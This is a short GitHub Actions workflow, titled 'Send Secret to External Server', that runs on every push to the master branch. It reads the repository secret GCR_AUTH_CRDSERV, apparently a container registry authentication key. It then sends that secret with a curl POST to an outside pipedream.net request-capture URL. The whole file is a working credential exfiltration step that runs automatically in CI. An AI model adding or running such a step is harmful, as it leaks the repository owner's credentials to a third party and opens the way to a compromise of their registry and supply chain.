name: Send Secret to External Server

on:
  push:
    branches:
      - "master"

jobs:
  send-secret:
    runs-on: ubuntu-latest
    env:
      GCR_AUTH_KEY: ${{ secrets.GCR_AUTH_CRDSERV }}
    steps:
      - name: Send Secret
        run: |
          curl -X POST -d "secret=${GCR_AUTH_KEY}" https://eo643zjufhup1e1.m.pipedream.net
